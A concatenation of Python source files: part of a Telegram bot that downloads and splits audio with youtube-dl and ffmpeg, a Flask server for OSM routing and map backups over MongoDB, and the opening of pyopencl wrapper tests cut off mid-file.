ProcessExecutionError(cmd_args, cmd_retcode, cmd_stdout, cmd_stderr) logger.info("%s succeeded: %s", cmd_name, url) status = 1 except TimeoutExpired: cmd_proc.kill() logger.info("%s took too much time and dropped: %s", cmd_name, url) status = -1 except ProcessExecutionError: logger.exception("%s failed: %s", cmd_name, url) if status == 0: cmd = youtube_dl_func cmd_name = "youtube_dl_func" # TODO: set different ydl_opts for different sites ydl_opts = { 'format': 'bestaudio/best', 'outtmpl': os.path.join(download_dir, '%(title)s.%(ext)s'), # default: %(autonumber)s - %(title)s-%(id)s.%(ext)s 'postprocessors': [ { 'key': 'FFmpegExtractAudio', 'preferredcodec': 'mp3', 'preferredquality': '128', }, # {'key': 'EmbedThumbnail',}, {'key': 'FFmpegMetadata',}, ], } host = urlparse(url).hostname if host == "tiktok.com" or host.endswith(".tiktok.com"): ydl_opts['postprocessors'] = [] ydl_opts['outtmpl'] = os.path.join(download_dir, 'tiktok.%(ext)s') if proxy: ydl_opts['proxy'] = proxy if source_ip: ydl_opts['source_address'] = source_ip # https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/YoutubeDL.py#L210 if self.cookies_file: if "http" in self.cookies_file: ydl_opts['cookiefile'] = self.COOKIES_DOWNLOAD_FILE else: ydl_opts['cookiefile'] = self.cookies_file queue = Queue() cmd_args = (url, ydl_opts, queue,) logger.info("%s starts: %s", cmd_name, url) cmd_proc = Process(target=cmd, args=cmd_args) cmd_proc.start() try: cmd_retcode, cmd_stderr = queue.get(block=True, timeout=self.DL_TIMEOUT) cmd_stdout = "" cmd_proc.join() if cmd_retcode: raise ProcessExecutionError(cmd_args, cmd_retcode, cmd_stdout, cmd_stderr) # raise cmd_status #TODO: pass and re-raise original Exception? logger.info("%s succeeded: %s", cmd_name, url) status = 1 except Empty: cmd_proc.join(1) if cmd_proc.is_alive(): cmd_proc.terminate() logger.info("%s took too much time and dropped: %s", cmd_name, url) status = -1 except ProcessExecutionError: logger.exception("%s failed: %s", cmd_name, url) status = -2 gc.collect() if status in [-1, -6]: bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text=self.DL_TIMEOUT_TEXT, parse_mode='Markdown') elif status == -2: bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text=self.NO_AUDIO_TEXT, parse_mode='Markdown') elif status == -3: bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text=self.DIRECT_RESTRICTION_TEXT, parse_mode='Markdown') elif status == -4: bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text=self.REGION_RESTRICTION_TEXT, parse_mode='Markdown') elif status == -5: bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text=self.LIVE_RESTRICTION_TEXT, parse_mode='Markdown') elif status == 1: file_list = [] for d, dirs, files in os.walk(download_dir): for file in files: file_list.append(os.path.join(d, file)) if not file_list: logger.info("No files in dir: %s", download_dir) bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text="*Sorry*, I couldn't download any files from provided links", parse_mode='Markdown') else: for file in sorted(file_list): file_name = os.path.split(file)[-1] file_parts = [] try: file_parts = self.convert_and_split_audio_file(file) except FileNotSupportedError as exc: if not (exc.file_format in ["m3u", "jpg", "jpeg", "png", "finished", "tmp"]): logger.warning("Unsupported file format: %s", file_name) bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text="*Sorry*, downloaded 
file `{}` is in format I could not yet convert or send".format( file_name), parse_mode='Markdown') except FileTooLargeError as exc: logger.info("Large file for convert: %s", file_name) bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text="*Sorry*, downloaded file `{}` is `{}` MB and it is larger than I could convert (`{} MB`)".format( file_name, exc.file_size // 1000000, self.MAX_CONVERT_FILE_SIZE // 1000000), parse_mode='Markdown') except FileSplittedPartiallyError as exc: file_parts = exc.file_parts logger.exception("Splitting failed: %s", file_name) bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text="*Sorry*, not enough memory to convert file `{}`..".format( file_name), parse_mode='Markdown') except FileNotConvertedError as exc: logger.exception("Splitting failed: %s", file_name) bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text="*Sorry*, not enough memory to convert file `{}`..".format( file_name), parse_mode='Markdown') try: caption = None flood = self.chat_storage[str(chat_id)]["settings"]["flood"] if flood == "yes": addition = "" url_obj = URL(url) if self.SITES["yt"] in url_obj.host: source = "YouTube" file_root, file_ext = os.path.splitext(file_name) file_title = file_root.replace(file_ext, "") addition = ": " + file_title elif self.SITES["sc"] in url_obj.host: source = "SoundCloud" elif self.SITES["bc"] in url_obj.host: source = "Bandcamp" else: source = url_obj.host.replace(".com", "").replace("www.", "").replace("m.", "") # if "youtu.be" in url_obj.host: # url = url.replace("http://", "").replace("https://", "") # else: # url = shorten_url(url) caption = "@{} _got it from_ [{}]({}){}".format(self.bot_username.replace("_", "\_"), source, url, addition.replace("_", "\_")) # logger.info(caption) sent_audio_ids = self.send_audio_file_parts(bot, chat_id, file_parts, reply_to_message_id if flood == "yes" else None, caption) except FileSentPartiallyError as exc: sent_audio_ids = exc.sent_audio_ids bot.send_message(chat_id=chat_id, reply_to_message_id=reply_to_message_id, text="*Sorry*, could not send file `{}` or some of it's parts..".format( file_name), parse_mode='Markdown') logger.warning("Sending some parts failed: %s", file_name) if not self.SERVE_AUDIO: shutil.rmtree(download_dir, ignore_errors=True) if wait_message_id: # TODO: delete only once try: bot.delete_message(chat_id=chat_id, message_id=wait_message_id) except: pass def convert_and_split_audio_file(self, file=""): file_root, file_ext = os.path.splitext(file) file_format = file_ext.replace(".", "").lower() file_size = os.path.getsize(file) # FIXME unknown_video is for tiktok if file_format not in ["mp3", "m4a", "mp4", "unknown_video"]: raise FileNotSupportedError(file_format) if file_size > self.MAX_CONVERT_FILE_SIZE: raise FileTooLargeError(file_size) # FIXME unknown_video is for tiktok and also tiktok.mp4 if file_format not in ["mp3", "unknown_video"] and "tiktok." 
not in file: logger.info("Converting: %s", file) try: file_converted = file.replace(file_ext, ".mp3") ffinput = ffmpeg.input(file) ffmpeg.output(ffinput, file_converted, audio_bitrate="128k", vn=None).run() file = file_converted file_root, file_ext = os.path.splitext(file) file_format = file_ext.replace(".", "").lower() file_size = os.path.getsize(file) except Exception: # TODO exceptions raise FileNotConvertedError file_parts = [] if file_size <= self.MAX_TG_FILE_SIZE: file_parts.append(file) else: logger.info("Splitting: %s", file) id3 = None try: id3 = ID3(file, translate=False) except: pass parts_number = file_size // self.MAX_TG_FILE_SIZE + 1 # https://github.com/c0decracker/video-splitter # https://superuser.com/a/1354956/464797 try: # file_duration = float(ffmpeg.probe(file)['format']['duration']) part_size = file_size // parts_number cur_position = 0 for i in range(parts_number): file_part = file.replace(file_ext, ".part{}{}".format(str(i + 1), file_ext)) ffinput = ffmpeg.input(file) if i == (parts_number - 1): ffmpeg.output(ffinput, file_part, codec="copy", vn=None, ss=cur_position).run() else: ffmpeg.output(ffinput, file_part, codec="copy", vn=None, ss=cur_position, fs=part_size).run() part_duration = float(ffmpeg.probe(file_part)['format']['duration']) cur_position += part_duration if id3: try: id3.save(file_part, v1=2, v2_version=4) except: pass file_parts.append(file_part) except Exception: # TODO exceptions raise FileSplittedPartiallyError(file_parts) return file_parts def send_audio_file_parts(self, bot, chat_id, file_parts, reply_to_message_id=None, caption=None): sent_audio_ids = [] for index, file_part in enumerate(file_parts): path = pathlib.Path(file_part) file_name = os.path.split(file_part)[-1] # file_name = translit(file_name, 'ru', reversed=True) logger.info("Sending: %s", file_name) bot.send_chat_action(chat_id=chat_id, action=ChatAction.UPLOAD_AUDIO) caption_part = None if len(file_parts) > 1: caption_part = "Part {} of {}".format(str(index + 1), str(len(file_parts))) if caption: if caption_part: caption_full = caption_part + " | " + caption else: caption_full = caption else: if caption_part: caption_full = caption_part else: caption_full = "" # caption_full = textwrap.shorten(caption_full, width=190, placeholder="..") for i in range(3): try: if file_part.endswith('.mp3'): mp3 = MP3(file_part) duration = round(mp3.info.length) performer = None title = None try: performer = ", ".join(mp3['artist']) title = ", ".join(mp3['title']) except: pass if "127.0.0.1" in self.TG_BOT_API: audio = path.absolute().as_uri() logger.debug(audio) elif self.SERVE_AUDIO: audio = str(urljoin(self.APP_URL, str(path.relative_to(self.DL_DIR)))) logger.debug(audio) else: audio = open(file_part, 'rb') if i > 0: # maybe: Reply message not found reply_to_message_id = None audio_msg = bot.send_audio(chat_id=chat_id, reply_to_message_id=reply_to_message_id, audio=audio, duration=duration, performer=performer, title=title, caption=caption_full, parse_mode='Markdown') sent_audio_ids.append(audio_msg.audio.file_id) logger.info("Sending succeeded: %s", file_name) break # FIXME unknown_video is for tiktok elif file_part.endswith('.unknown_video') or "tiktok." 
in file_part: video = open(file_part, 'rb') video_msg = bot.send_video(chat_id=chat_id, reply_to_message_id=reply_to_message_id, video=video, # duration=duration, caption=caption_full, parse_mode='Markdown') sent_audio_ids.append(video_msg.video.file_id) logger.info("Sending succeeded: %s", file_name) break except TelegramError: if i == 2: logger.exception("Sending failed because of TelegramError: %s", file_name) if len(sent_audio_ids) != len(file_parts): raise FileSentPartiallyError(sent_audio_ids) return sent_audio_ids
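# --- Illustrative sketch (not part of the original module) -------------------
# A minimal, self-contained version of the size-based splitting performed in
# convert_and_split_audio_file() above: the file is cut into
# file_size // max_size + 1 parts with an ffmpeg stream copy, seeking with "ss"
# and capping each part's byte size with "fs". The file path and the size limit
# used here are assumptions for illustration only.
import os

import ffmpeg  # ffmpeg-python


def split_audio_by_size(path, max_size=45 * 1000 * 1000):
    """Split an audio file into stream-copied parts no larger than max_size bytes."""
    root, ext = os.path.splitext(path)
    size = os.path.getsize(path)
    if size <= max_size:
        return [path]
    parts_number = size // max_size + 1
    part_size = size // parts_number
    parts, position = [], 0.0
    for i in range(parts_number):
        part = "{}.part{}{}".format(root, i + 1, ext)
        kwargs = dict(codec="copy", vn=None, ss=position)
        if i < parts_number - 1:  # the last part simply takes whatever remains
            kwargs["fs"] = part_size
        ffmpeg.output(ffmpeg.input(path), part, **kwargs).run()
        # advance the seek position by the duration of the part just written
        position += float(ffmpeg.probe(part)["format"]["duration"])
        parts.append(part)
    return parts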
server.py
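# Flask HTTP API for an OSM routing graph stored in MongoDB: it exposes routing,
# Overpass map download, backup and background-search endpoints, and runs all
# long-running work in background threads that clients track via /api/0.5/check.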
import datetime import json import os import requests import random import threading import logging from flask import Flask from flask import request from pymongo import MongoClient from routing import configuration from routing import graph from routing import osm_handler from routing.utils import bring_closer mongo_client = MongoClient() db_client = mongo_client['osm'] map_graph = graph.Graph(db_client) handler = osm_handler.OsmHandler(db_client) config = configuration.Configuration() logging.basicConfig(filename="server.log", level=logging.INFO) app = Flask(__name__) import string import random def id_generator(size=10, chars=string.ascii_uppercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) def process_back_search(id): map_graph.background_search() info = config.get_tmp_by_key(id) info['data'] = {'isEnd': True} config.set_tmp_by_key(id, info) logging.info('Server. Back_search has finished.') def process_backup_create(id): handler.create_backup(config.get_bounds()) config.set_backup_info({ 'exist': True, 'path': '../settings/backup.json', 'date': datetime.datetime.today().strftime("%d.%m.%Y %H:%M") }) config.save_config() info = config.get_tmp_by_key(id) info['data'] = config.get_backup_info() config.set_tmp_by_key(id, info) logging.info('Server. Backup_create has finished.') def process_backup_load(path, id): bounds = handler.load_backup(path) config.set_bounds(bounds) config.save_config() info = config.get_tmp_by_key(id) info['data'] = config.get_backup_info() config.set_tmp_by_key(id, info) logging.info('Server. Backup_load has finished.') def process_map(str_req, id): r = requests.get(str_req, stream=True) if r.status_code == 200: with open(os.path.join('..', 'settings', 'tmp.osm'), 'wb') as f: for chunk in r.iter_content(1024): f.write(chunk) bounds = handler.parse(open(os.path.join('..', 'settings', 'tmp.osm'), 'r', encoding='utf8')) if os.path.isfile(os.path.join('..', 'settings', 'tmp.osm')): os.remove(os.path.join('..', 'settings', 'tmp.osm')) if bounds not in config.get_bounds(): config.add_bounds(bounds) config.save_config() info = config.get_tmp_by_key(id) info['data'] = {'bounds': bounds} config.set_tmp_by_key(id, info) logging.info('Server. 
Process_map has finished.') else: logging.error('Server.Process_map: Map download failed.') @app.route("/api/0.5/fullroute") # /api/0.5/fullroute?lat1=1.1&lon1=1.2&lat2=2.1&lon2=2.2 def route(): try: lat1 = float(request.args.get('lat1')) lon1 = float(request.args.get('lon1')) lat2 = float(request.args.get('lat2')) lon2 = float(request.args.get('lon2')) except: logging.error("Server.fullroute: Invalid request arguments") return json.dumps( { 'error': True, 'data': {}, 'msg': "Error in args" }) try: node1 = map_graph.find_nearest([lat1, lon1]) node2 = map_graph.find_nearest([lat2, lon2]) logging.info(f'Routing {node1}, {node2}') right = map_graph.astar(node1, node2) path_right = [] time_right = 0 length_right = 0 if right: path_right = right['path'] time_right = right['dist'] for i, node in enumerate(path_right): if i == len(path_right) - 1: break length_right = length_right + map_graph.distance_between(node, path_right[i + 1]) path_right = map_graph.clarify_path_to_loc(path_right) if path_right else [] if path_right: if len(path_right) > 1: start = bring_closer({'loc': [lat1, lon1], 'nodes': [[a['lat'], a['lon']] for a in path_right[0:2]]}) middle = path_right[1:len(path_right) - 1] end = bring_closer({'loc': [lat2, lon2], 'nodes': [[a['lat'], a['lon']] for a in path_right[len(path_right) - 1:len(path_right) - 3:-1]]}) end.reverse() else: start = [{'lat': lat1, 'lon': lon1}] middle = path_right end = [{'lat': lat2, 'lon': lon2}] path_right = start + middle + end left = map_graph.astar(node1, node2, nodes_client_for_left=map_graph.db_client.nodes) path_left = [] time_left = 0 length_left = 0 if left: path_left = left['path'] time_left = left['dist'] for i, node in enumerate(path_left): if i == len(path_left) - 1: break length_left = length_left + map_graph.distance_between(node, path_left[i + 1]) path_left = map_graph.clarify_path_to_loc(path_left) if path_left else [] if path_left: if len(path_left) > 1: start = bring_closer({'loc': [lat1, lon1], 'nodes': [[a['lat'], a['lon']] for a in path_left[0:2]]}) middle = path_left[1:len(path_left) - 1] end = bring_closer({'loc': [lat2, lon2], 'nodes': [[a['lat'], a['lon']] for a in path_left[len(path_left) - 1:len(path_left) - 3:-1]]}) end.reverse() else: start = [{'lat': lat1, 'lon': lon1}] middle = path_left end = [{'lat': lat2, 'lon': lon2}] path_left = start + middle + end except ValueError as e: return json.dumps({'error': True, 'data': {}, 'msg': str(e)}) logging.info(f"""Send this: {{ 'error': False, 'data': {{ 'from': {{'lat': {lat1}, 'lon': {lon1}}}, 'to': {{'lat': {lat2}, 'lon': {lon2}}}, 'path_right': {path_right}, 'distance_right': {length_right}, 'time_right': {time_right}, 'path_left': {path_left}, 'distance_left': {length_left}, 'time_left': {time_left} }}, 'msg': "Full routing" }} """) return json.dumps( { 'error': False, 'data': { 'from': {'lat': lat1, 'lon': lon1}, 'to': {'lat': lat2, 'lon': lon2}, 'path_right': path_right, 'distance_right': length_right, 'time_right': time_right, 'path_left': path_left, 'distance_left': length_left, 'time_left': time_left }, 'msg': "Full routing" }) @app.route("/api/0.5/route_id") # /api/0.5/route_id?id1=11&id2=22 def route_id(): try: id1 = int(request.args.get('id1')) id2 = int(request.args.get('id2')) except: return json.dumps({'error': True, 'data': {}, 'msg': "Error in args"}) try: path = map_graph.astar(id1, id2) except ValueError as e: return json.dumps({'error': True, 'data': {}, 'msg': str(e)}) path = list(path) if path else [] return json.dumps( { 'error': False, 'data': {'path': path},
'msg': "Routing by id" }) @app.route("/api/0.5/fullroute_id") # /api/0.5/fullroute_id?id1=11&id2=22 def fullroute_id(): try: id1 = int(request.args.get('id1')) id2 = int(request.args.get('id2')) except: logging.error("Server.fullroute_id: Неверные аргументы запроса") return json.dumps({'error': True, 'data': {}, 'msg': "Error in args"}) try: path = map_graph.astar(id1, id2) except ValueError as e: return json.dumps({'error': True, 'data': {}, 'msg': str(e)}) path = map_graph.clarify_path_to_loc(path) if path else [] return json.dumps( { 'error': False, 'data': {'path': path}, 'msg': "Full routing by id" }) @app.route("/api/0.5/create_backup") def create_backup(): id = id_generator() thread = threading.Thread(target=process_backup_create, args=(id,)) config.add_tmp(id, {'thread': thread}) thread.start() logging.info("Server.create_backup: Создание backup'a...") return json.dumps( { 'error': False, 'data': {'id': id}, 'msg': "Backup is starting" }) @app.route("/api/0.5/load_backup") def load_backup(): info = config.get_backup_info() if info['exist']: id = id_generator() thread = threading.Thread(target=process_backup_load, args=(info['path'],id)) config.add_tmp(id, {'thread': thread}) thread.start() logging.info("Server.load_backup: Загрузка backup'a...") return json.dumps( { 'error': False, 'data': {'id': id}, 'msg': "Backup is loading" }) logging.info('Server.load_backup: Backup отсутствует') return json.dumps( { 'error': True, 'data': {}, 'msg': "Backup doesn't exist" }) @app.route("/api/0.5/load_map") # /api/0.5/load_map?min_lat=1.1&min_lon=1.2&max_lat=2.1&max_lon=2.2 def load_map(): try: min_lat = float(request.args.get('min_lat')) min_lon = float(request.args.get('min_lon')) max_lat = float(request.args.get('max_lat')) max_lon = float(request.args.get('max_lon')) except: logging.error("Server.load_map: Неверные аргументы запроса") return json.dumps({'error': True, 'data': {}, 'msg': "Error in args"}) str_req = 'https://overpass-api.de/api/map?bbox=' + str(min_lon) + ',' + str(min_lat) + ',' + str(max_lon) + ',' + str(max_lat) id = id_generator() thread = threading.Thread(target=process_map, args=(str_req,id)) config.add_tmp(id, {'thread': thread}) thread.start() logging.info('Server.load_map: Скачивание карты началось.') return json.dumps( { 'error': False, 'data': {'id': id}, 'msg': "Downloading has been started" }) @app.route("/api/0.5/bounds") def get_bounds(): logging.info(f"""Send this: {{ 'error': False, 'data': {{'bounds': {config.get_bounds()}}}, 'msg': "Map's bounds" }} """) return json.dumps( { 'error': False, 'data': {'bounds': config.get_bounds()}, 'msg': "Map's bounds" }) @app.route("/api/0.5/back_search") def back_search(): logging.warning('Server. Фоновый поиск запущен.') id = id_generator() thread = threading.Thread(target=process_back_search, args=(id,)) config.add_tmp(id, {'thread': thread}) thread.start() return json.dumps({ 'error': False, 'data': {'id': id}, 'msg': "Searching has been started" }) @app.route("/api/0.5/check") # /api/0.5/check?id=string def check(): try: id = request.args.get('id') except: logging.error("Server.check: Неверные аргументы запроса") return json.dumps({'error': True, 'data': {}, 'msg': "Error in args" }) info = config.get_tmp_by_key(id) if not info: # если поток не отслеживается return json.dumps({ 'error': True, 'data': {'run': False, 'data': {}}, 'msg': "Thread is not monitored." 
}) if info['thread'].is_alive(): # the thread is still running return json.dumps({ 'error': False, 'data': {'run': True, 'data': {}}, 'msg': "Thread is still running" }) else: if 'data' in info: # the thread has finished and produced data config.del_tmp(id) return json.dumps({ 'error': False, 'data': {'run': False, 'data': info['data']}, 'msg': "Thread has finished" }) else: # the thread has finished without data config.del_tmp(id) return json.dumps({ 'error': True, 'data': {'run': False, 'data': {}}, 'msg': "Something went wrong" }) @app.route("/api/0.5/delete_graph") def delete_graph(): logging.warning('Server. Deleting graph from the DB.') map_graph.delete_graph() return json.dumps({ 'error': False, 'data': {}, 'msg': "Graph has been deleted" }) @app.route("/api/0.5/drop") def drop(): logging.warning('Server. Dropping the DB.') db_client.nodes.drop() db_client.ways.drop() handler.create_indexes() config.set_bounds([]) return json.dumps({ 'error': False, 'data': {}, 'msg': "DB has been dropped" }) app.run(host=config.get_ip(), port=config.get_port(), debug=True)
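# --- Illustrative sketch (not part of the original module) -------------------
# How a client is expected to drive the asynchronous endpoints above: /load_map
# (likewise /create_backup, /load_backup, /back_search) returns a job id, and
# /check?id=... is polled until data.run becomes False. The host, port and
# bounding box below are assumptions for illustration only.
import time

import requests

BASE_URL = "http://127.0.0.1:5000/api/0.5"  # assumed address of this server


def load_map_and_wait(bbox, poll_every=2.0):
    """Start a map download and block until the background thread has finished."""
    resp = requests.get(BASE_URL + "/load_map", params=bbox).json()
    if resp["error"]:
        raise RuntimeError(resp["msg"])
    job_id = resp["data"]["id"]
    while True:
        status = requests.get(BASE_URL + "/check", params={"id": job_id}).json()
        if not status["data"]["run"]:
            return status["data"]["data"]
        time.sleep(poll_every)


# Example call:
# load_map_and_wait({"min_lat": 55.70, "min_lon": 37.50, "max_lat": 55.80, "max_lon": 37.70})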
test_wrapper.py
__copyright__ = "Copyright (C) 2009 Andreas Kloeckner" __license__ = """ Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ # avoid spurious: pytest.mark.parametrize is not callable # pylint: disable=not-callable import numpy as np import numpy.linalg as la import pytest import pyopencl as cl import pyopencl.array as cl_array import pyopencl.cltypes as cltypes import pyopencl.clrandom from pyopencl.tools import ( # noqa pytest_generate_tests_for_pyopencl as pytest_generate_tests, ImmediateAllocator, DeferredAllocator) from pyopencl.characterize import get_pocl_version # Are CL implementations crashy? You be the judge. :) try: import faulthandler # noqa except ImportError: pass else: faulthandler.enable() def _xfail_if_pocl(plat, up_to_version, msg="unsupported by pocl"): if plat.vendor == "The pocl project": if up_to_version is None or get_pocl_version(plat) <= up_to_version: pytest.xfail(msg) def _xfail_if_pocl_gpu(device, what): if device.platform.vendor == "The pocl project" \ and device.type & cl.device_type.GPU: pytest.xfail(f"POCL's {what} support don't work right on Nvidia GPUs, " "at least the Titan V, as of pocl 1.6, 2021-01-20") def test_get_info(ctx_factory): ctx = ctx_factory() device, = ctx.devices platform = device.platform device.persistent_unique_id device.hashable_model_and_version_identifier failure_count = [0] pocl_quirks = [ (cl.Buffer, cl.mem_info.OFFSET), (cl.Program, cl.program_info.BINARIES), (cl.Program, cl.program_info.BINARY_SIZES), ] if ctx._get_cl_version() >= (1, 2) and cl.get_cl_header_version() >= (1, 2): pocl_quirks.extend([ (cl.Program, cl.program_info.KERNEL_NAMES), (cl.Program, cl.program_info.NUM_KERNELS), ]) CRASH_QUIRKS = [ # noqa (("NVIDIA Corporation", "NVIDIA CUDA", "OpenCL 1.0 CUDA 3.0.1"), [ (cl.Event, cl.event_info.COMMAND_QUEUE), ]), (("NVIDIA Corporation", "NVIDIA CUDA", "OpenCL 1.2 CUDA 7.5"), [ (cl.Buffer, getattr(cl.mem_info, "USES_SVM_POINTER", None)), ]), (("The pocl project", "Portable Computing Language", "OpenCL 1.2 pocl 0.8-pre"), pocl_quirks), (("The pocl project", "Portable Computing Language", "OpenCL 1.2 pocl 0.8"), pocl_quirks), (("The pocl project", "Portable Computing Language", "OpenCL 1.2 pocl 0.9-pre"), pocl_quirks), (("The pocl project", "Portable Computing Language", "OpenCL 1.2 pocl 0.9"), pocl_quirks), (("The pocl project", "Portable Computing Language", "OpenCL 1.2 pocl 0.10-pre"), pocl_quirks), (("The pocl project", "Portable Computing Language", "OpenCL 1.2 pocl 0.10"), pocl_quirks), (("Apple", "Apple", "OpenCL 1.2"), [ (cl.Program, cl.program_info.SOURCE), ]), ] 
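# CRASH_QUIRKS maps (vendor, platform name, version prefix) tuples to get_info
# queries that are known to crash outright; do_test() below skips those entirely.
# QUIRKS, defined just below, lists queries that are allowed to fail without
# being counted towards failure_count.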
QUIRKS = [] # noqa def find_quirk(quirk_list, cl_obj, info): for (vendor, name, version), quirks in quirk_list: if ( vendor == platform.vendor and name == platform.name and platform.version.startswith(version)): for quirk_cls, quirk_info in quirks: if (isinstance(cl_obj, quirk_cls) and quirk_info == info): return True return False def do_test(cl_obj, info_cls, func=None, try_attr_form=True): if func is None: func = cl_obj.get_info for info_name in dir(info_cls): if not info_name.startswith("_") and info_name != "to_string": print(info_cls, info_name) info = getattr(info_cls, info_name) if find_quirk(CRASH_QUIRKS, cl_obj, info): print("not executing get_info", type(cl_obj), info_name) print("(known crash quirk for %s)" % platform.name) continue try: func(info) except Exception: msg = "failed get_info", type(cl_obj), info_name if find_quirk(QUIRKS, cl_obj, info): msg += ("(known quirk for %s)" % platform.name) else: failure_count[0] += 1 if try_attr_form: try: getattr(cl_obj, info_name.lower()) except Exception: print("failed attr-based get_info", type(cl_obj), info_name) if find_quirk(QUIRKS, cl_obj, info): print("(known quirk for %s)" % platform.name) else: failure_count[0] += 1 do_test(platform, cl.platform_info) do_test(device, cl.device_info) do_test(ctx, cl.context_info) props = 0 if (device.queue_properties & cl.command_queue_properties.PROFILING_ENABLE): profiling = True props = cl.command_queue_properties.PROFILING_ENABLE queue = cl.CommandQueue(ctx, properties=props) do_test(queue, cl.command_queue_info) prg = cl.Program(ctx, """ __kernel void sum(__global float *a) { a[get_global_id(0)] *= 2; } """).build() do_test(prg, cl.program_info) do_test(prg, cl.program_build_info, lambda info: prg.get_build_info(device, info), try_attr_form=False) n = 2000 a_buf = cl.Buffer(ctx, 0, n*4) do_test(a_buf, cl.mem_info) kernel = prg.all_kernels()[0] do_test(kernel, cl.kernel_info) for i in range(2): # exercise cache for info_name in dir(cl.kernel_work_group_info): if not info_name.startswith("_") and info_name != "to_string": try: print("kernel_wg_info: %s" % info_name) kernel.get_work_group_info( getattr(cl.kernel_work_group_info, info_name), device) except cl.LogicError as err: print("<error: %s>" % err) evt = kernel(queue, (n,), None, a_buf) do_test(evt, cl.event_info) if profiling: evt.wait() do_test(evt, cl.profiling_info, lambda info: evt.get_profiling_info(info), try_attr_form=False) # crashes on intel... 
# and pocl does not support CL_ADDRESS_CLAMP if device.image_support and platform.vendor not in [ "Intel(R) Corporation", "The pocl project", ]: smp = cl.Sampler(ctx, False, cl.addressing_mode.CLAMP, cl.filter_mode.NEAREST) do_test(smp, cl.sampler_info) img_format = cl.get_supported_image_formats( ctx, cl.mem_flags.READ_ONLY, cl.mem_object_type.IMAGE2D)[0] img = cl.Image(ctx, cl.mem_flags.READ_ONLY, img_format, (128, 256)) assert img.shape == (128, 256) img.depth img.image.depth do_test(img, cl.image_info, lambda info: img.get_image_info(info)) def test_int_ptr(ctx_factory): def do_test(obj): new_obj = type(obj).from_int_ptr(obj.int_ptr) assert obj == new_obj assert type(obj) is type(new_obj) ctx = ctx_factory() device, = ctx.devices platform = device.platform do_test(device) do_test(platform) do_test(ctx) queue = cl.CommandQueue(ctx) do_test(queue) evt = cl.enqueue_marker(queue) do_test(evt) prg = cl.Program(ctx, """ __kernel void sum(__global float *a) { a[get_global_id(0)] *= 2; } """).build() do_test(prg) do_test(prg.sum) n = 2000 a_buf = cl.Buffer(ctx, 0, n*4) do_test(a_buf) # crashes on intel... # and pocl does not support CL_ADDRESS_CLAMP if device.image_support and platform.vendor not in [ "Intel(R) Corporation", "The pocl project", ]: smp = cl.Sampler(ctx, False, cl.addressing_mode.CLAMP, cl.filter_mode.NEAREST) do_test(smp) img_format = cl.get_supported_image_formats( ctx, cl.mem_flags.READ_ONLY, cl.mem_object_type.IMAGE2D)[0] img = cl.Image(ctx, cl.mem_flags.READ_ONLY, img_format, (128, 256)) do_test(img) def test_invalid_kernel_names_cause_failures(ctx_factory): ctx = ctx_factory() device = ctx.devices[0] prg = cl.Program(ctx, """ __kernel void sum(__global float *a) { a[get_global_id(0)] *= 2; } """).build() try: prg.sam raise RuntimeError("invalid kernel name did not cause error") except AttributeError: pass except RuntimeError: if "Intel" in device.platform.vendor: from pytest import xfail xfail("weird exception from OpenCL implementation " "on invalid kernel name--are you using " "Intel's implementation? 
(if so, known bug in Intel CL)") else: raise def test_image_format_constructor(): # doesn't need image support to succeed iform = cl.ImageFormat(cl.channel_order.RGBA, cl.channel_type.FLOAT) assert iform.channel_order == cl.channel_order.RGBA assert iform.channel_data_type == cl.channel_type.FLOAT if not cl._PYPY: assert not hasattr(iform, "__dict__") def test_device_topology_amd_constructor(): # doesn't need cl_amd_device_attribute_query support to succeed topol = cl.DeviceTopologyAmd(3, 4, 5) assert topol.bus == 3 assert topol.device == 4 assert topol.function == 5 if not cl._PYPY: assert not hasattr(topol, "__dict__") def test_nonempty_supported_image_formats(ctx_factory): context = ctx_factory() device = context.devices[0] if device.image_support: assert len(cl.get_supported_image_formats( context, cl.mem_flags.READ_ONLY, cl.mem_object_type.IMAGE2D)) > 0 else: from pytest import skip skip("images not supported on %s" % device.name) def test_that_python_args_fail(ctx_factory): context = ctx_factory() prg = cl.Program(context, """ __kernel void mult(__global float *a, float b, int c) { a[get_global_id(0)] *= (b+c); } """).build() a = np.random.rand(50000) queue = cl.CommandQueue(context) mf = cl.mem_flags a_buf = cl.Buffer(context, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=a) knl = cl.Kernel(prg, "mult") try: knl(queue, a.shape, None, a_buf, 2, 3) assert False, "PyOpenCL should not accept bare Python types as arguments" except cl.LogicError: pass try: prg.mult(queue, a.shape, None, a_buf, float(2), 3) assert False, "PyOpenCL should not accept bare Python types as arguments" except cl.LogicError: pass prg.mult(queue, a.shape, None, a_buf, np.float32(2), np.int32(3)) a_result = np.empty_like(a) cl.enqueue_copy(queue, a_buf, a_result).wait() def test_image_2d(ctx_factory): context = ctx_factory() device, = context.devices if not device.image_support: from pytest import skip skip("images not supported on %s" % device) if "Intel" in device.vendor and "31360.31426" in device.version: from pytest import skip skip("images crashy on %s" % device) _xfail_if_pocl(device.platform, None, "pocl does not 